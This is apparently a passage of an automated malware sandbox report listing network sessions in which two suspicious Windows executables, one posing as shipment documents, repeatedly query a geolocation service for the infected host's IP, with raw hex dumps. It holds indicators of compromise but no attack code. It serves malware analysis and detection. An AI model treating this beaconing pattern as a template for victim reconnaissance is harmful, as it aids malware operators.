                                                    2024-10-11 07:35:21 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    3 | 192.168.2.4 | 49741 | 188.114.96.34 | 443 | 7768 | C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-11 07:35:21 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-10-11 07:35:21 UTC | 712 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:21 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 2
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IxudtAYZK9cKz01c2kOK18RfMHj1vmfFh6%2FexpG%2FewO%2BOd0NamOy2ncxD0rJEXUgVS%2Bh0GPhLrH7KHcmHF%2B1jQ432Mq8MWrYXaXn6%2BQIy%2FuB7ZXIO2SI7CRUJHzQyRrpaFn%2Bq3n1"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c483c5a42d1-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:21 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    4 | 192.168.2.4 | 49742 | 188.114.96.34 | 443 | 8136 | C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-11 07:35:21 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-10-11 07:35:22 UTC | 702 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:22 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 3
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vWumMPE4dUJQtVIyXq2BcYKgmXw%2FVpaWqONPxMe9b4YJ3GX100ZKLTNaJZ45TJgUy4sV51Apm6ynBE%2FOTuAV0NNiFL28diOINLPE%2FDwPNpbxCQ73zpK4dceEDs8XerGTIjVw6wnK"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c4a98a380e2-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:22 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    5 | 192.168.2.4 | 49745 | 188.114.96.34 | 443 | 7768 | C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-11 07:35:22 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-10-11 07:35:23 UTC | 700 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:22 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 3
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m7SH63OV42T2GliWy191I3SQZ378Z7S1ZWuFTAlfyo7PUqhWpl0TbNbz566xUWrmEryGgdNnHDOlggO0t4H%2B3x2jegv9XMX0rncWZGdvHT0bUDYBCS6%2FlrKeFfTmYlQ3U5mW1tZE"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c507de7c332-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:23 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    6 | 192.168.2.4 | 49746 | 188.114.96.34 | 443 | 8136 | C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-11 07:35:23 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-10-11 07:35:23 UTC | 706 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:23 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 4
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EqZtSLB4Iq9KfdnrI3z7%2Fe5vgDcyvP9gMVt5z5TUkTaWQ1cCm9k5x7sgkVcIwt6OasnODTt1bRBrjGoonYkbY7hN50%2F1zfc1jt%2FwP3UcqRwpFYsdX7Q3DB6oy%2FIe3u4NsNLn9PH%2B"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c52aa0318cc-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:23 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    7 | 192.168.2.4 | 49749 | 188.114.96.34 | 443 | 7768 | C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-11 07:35:24 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-10-11 07:35:24 UTC | 714 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:24 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 5
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2qe7t6%2BKNIcl%2FwxXBnGS5XND1RVk6l1DIdl5keNmok5h2d6U58HTiG%2FwyBrpIkhiQeG3z%2B%2Bz5Kn1Mb%2F5ftTA%2BwqrRiOFTm5dSQXx24J7mhHwXTnsgtd3htjg%2BH9RTDD4QMTr%2FxV3"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c58cc3b1855-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:24 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    8 | 192.168.2.4 | 49750 | 188.114.96.34 | 443 | 8136 | C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-11 07:35:24 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:24 UTC | 704 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:24 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 5
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U12Xq6ZMVpQSVkjhg5A%2F5JshIhSl%2FaQJRJD8iRWtJSqsOXq6DVzoKHYHEU992ZUT3DBxxnk2lVfkKTrdrBCJ4sz22PuEOPnU5d%2BTTdKNlL5MZXRlNxbRi%2Bm8z3ub5WgmvF5MZ0A3"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c5afff117f5-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:24 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    9 | 192.168.2.4 | 49753 | 188.114.96.34 | 443 | 7768 | C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-11 07:35:25 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:25 UTC | 704 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:25 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 6
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sVRzsZaw26Rx%2BpAc4uwryu1aSCcBSMEY4d%2BzDmMWo1ohwwdLmUuJ47tbENWtz%2FjWDNRlbZuzhqffkvnFVMOpn9td83wz5c2Atd2iQgTWex8Hx0C7qiMrW3yB85vVM2yUYXFBX%2Bu0"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c60e8224332-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:25 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    10 | 192.168.2.4 | 49754 | 188.114.96.34 | 443 | 8136 | C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-11 07:35:25 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:25 UTC | 708 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:25 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 6
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2knROu7JeUScCbI0QTafNHWxBLA578GjshF6pS%2FhD5VsCrXd4T3TUHyN5I0%2FTX1HoM%2B%2BG6q7pSdFKJmm%2B3jSBg5IIqvKTPZ4OuEsNdxhKILLE543wHRpm3xCzMnPE2v22fB5KK%2B7"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c62e8631801-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:25 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    11 | 192.168.2.4 | 49757 | 188.114.96.34 | 443 | 7768 | C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-10-11 07:35:26 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:26 UTC | 700 | IN | HTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:26 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 7
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=agjrrytN4dpaAaTI6GlkrOOJLH49MHAb65%2FkKAzej0lu2g3qnDyewjWs1fNlRbIr0sjsMexmh3F9vfJcNCXd1cWO14WTcIN6qXIgVZnh89iMVsq%2B1ysWWi3CDMBPW3vycU0JOwMl"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c6908a80f4a-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:26 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
